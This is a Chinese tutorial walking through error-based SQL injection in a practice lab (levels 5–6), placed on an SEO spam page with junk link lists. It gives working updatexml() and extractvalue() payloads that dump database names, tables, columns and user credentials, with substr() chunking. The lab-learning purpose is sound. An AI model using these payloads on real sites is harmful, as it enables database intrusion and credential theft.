当前位置: 首页 > wzjs >正文

网站主流系统seo知识培训

网站主流系统,seo知识培训,湖南衡五建设公司网站,WordPress装不上jetpack第5关 报错注入首先判断闭合方式,发现是单引号闭合。但是新的问题出现了,它页面回显只有正确和报错两种状态,没有回显位,意味着union联合注入攻击不能生效。只要思想不滑坡,办法总比困难多。这里发现报错的语句也会回显…

第5关 报错注入

首先判断闭合方式,发现是单引号闭合。

但是新的问题出现了,它页面回显只有正确和报错两种状态,没有回显位,意味着union联合注入攻击不能生效。

只要思想不滑坡,办法总比困难多。这里发现报错的语句也会回显到页面上,那么就可以尝试使用报错注入。

需要用到两个函数,updatexml() 和 extractvalue()函数。

这两个函数都是 MySQL 内置的用于处理 XML 数据的函数,语法如下:

//UPDATEXML函数
UPDATEXML(xml_target, xpath_expr, new_value)//EXTRACTVALUE函数
EXTRACTVALUE(xml_frag, xpath_expr)

updatexml()用于修改,extractvalue()用于查询,两者都严重依赖第二个参数作为 XPath 表达式 来定位或操作 XML 中的特定部分。当提供一个无效的、不符合 XPath 语法规则的字符串作为第二个参数时,函数会执行失败并抛出一个运行时错误。这正是关键点所在,如果在不合法的字符串中构造子查询语句,那么数据库在报错时,会将子查询的结果包含在内。

本关中报错是有回显的,意味着可以利用这两个函数去构造语句来读取回显数据。

1.updatexml()函数构造

?id=1' and updatexml(1,concat(0x7e,(select database())),3) --+

 解释:updatexml()函数需要有三个参数,1和3作为占位符,0x7e是“~”符号的16进制,作用是构造无效的XPath表达式(在XPath 1.0 规范中,表达式不能以操作符开头),concat()起拼接作用,将子查询语句连接到其中。

(1)这里成功查询到当前数据库的名称。

 (2)进一步查询。

//查询数据库中的表
?id=1' and updatexml(1,concat(0x7e,(
select group_concat(table_name) from information_schema.tables where table_schema=database()
)),3) --+
//查询表中字段
?id=1' and updatexml(1,concat(0x7e,(
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'
)),3) --+
//查询字段数据
?id=1' and updatexml(1,concat(0x7e,(
select group_concat(username,password) from users
)),3) --+

这里又出现了一个新的问题,MySQL 对错误信息的长度有限制,updatexml()函数最多返回 32 字节。回显的数据不完整。

可以使用substr()函数分段提取数据。

?id=1' and updatexml(1,concat(0x7e,
substr((select group_concat(concat(username,'@',password)) from users),1,10
)),3) --+

 2.extractvalue()函数构造

方法和updatexml()相同。

第6关 双引号闭合的报错注入

解法与上一关相同。

http://www.dtcms.com/wzjs/149059.html

相关文章:

  • 阿里巴巴网站基础建设首保服务刷移动关键词优化
  • 襄阳做网站价格沪深300指数
  • 松江做网站需要多少钱西安网站制作公司
  • 柯桥做网站的公司百度高级搜索页面的网址
  • 新开发的网站怎么做测试中文域名
  • awada wordpress网站结构优化的内容和方法
  • 互联网是什么意思台州seo排名优化
  • 菏泽官方网站软件外包平台
  • 淄博网站排名百度电视剧风云榜
  • 网站建设的需求it培训机构口碑排名
  • wordpress视屏站2022搜索引擎
  • 做调查的有哪些网站有哪些全渠道营销管理平台
  • 站长工具5g最近新闻摘抄50字
  • 青岛网站建设机构竞价托管sem服务
  • 濮阳网站建设代运营哪家公司最靠谱
  • 上海网站建设 永灿网站设计方案
  • 游戏网站平台怎么做的网站seo公司
  • 个人网站可以做淘宝客嘛广告推广一个月多少钱
  • 创业型企业网站模板如何制作自己的网站教程
  • 如何做移动端网站seo行业岗位有哪些
  • 网站开发招标采购需求怎么建立自己的网站
  • 企业建站系统免费东莞百度seo排名
  • 保山哪里有网站建设三只松鼠的软文范例
  • 小说网站如何做书源网络营销大赛策划书
  • 贸易公司网站建设要多少钱百度快照怎么打开
  • 十堰新闻网爱站网站seo查询工具
  • 企业网站模板下载哪家口碑好新手做seo怎么做
  • 销售加app安卓下载官网seo综合查询怎么进入网站
  • 河南平顶山网站建设与管理专业百度官网app下载安装
  • 重庆招考网seosem是什么职位